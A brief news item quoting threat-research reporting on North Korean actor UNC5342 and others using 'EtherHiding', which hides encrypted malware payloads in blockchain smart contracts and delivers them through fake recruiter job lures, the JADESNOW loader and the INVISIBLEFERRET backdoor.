North Korea uses blockchains as indelible malware hosts

North Korea uses blockchains as indelible malware hosts

Briefly

"EtherHiding uses smart contracts on blockchains such as Ethereum and BNB Smart Chain to hide and spread malicious code. This approach provides attackers with a virtually indestructible infrastructure, as the data on the blockchain is decentralized, transparent, and immutable. In the context of cybercrime, EtherHiding is considered a form of bulletproof hosting. This is infrastructure that is immune to legal or technical removal."

"In the campaign, UNC5342 approaches victims via fake job advertisements. The attackers pose as recruiters from well-known technology companies and convince targets to perform test assignments or download files. These files contain the JADESNOW malware, a JavaScript loader. This connects to a smart contract on the blockchain. It contains an encrypted payload that, once decrypted, initiates the second phase of infection. Ultimately, the INVISIBLEFERRET backdoor is executed, giving the attackers long-term access to the system and enabling them to steal data or cryptocurrency."

"According to Google researchers, in addition to UNC5342, financially motivated actors such as UNC5142 also use EtherHiding to spread malware. The advantages of this technique are considerable: the decentralized nature of blockchains prevents smart contracts from being deleted, immutability protects against modification, transactions remain pseudonymous, and retrieving the malware leaves no traces in log files. Furthermore, attackers can update their malicious code at any time. Creating or modifying a smart contract typically costs less than two dollars, making EtherHiding a cheap and efficient method."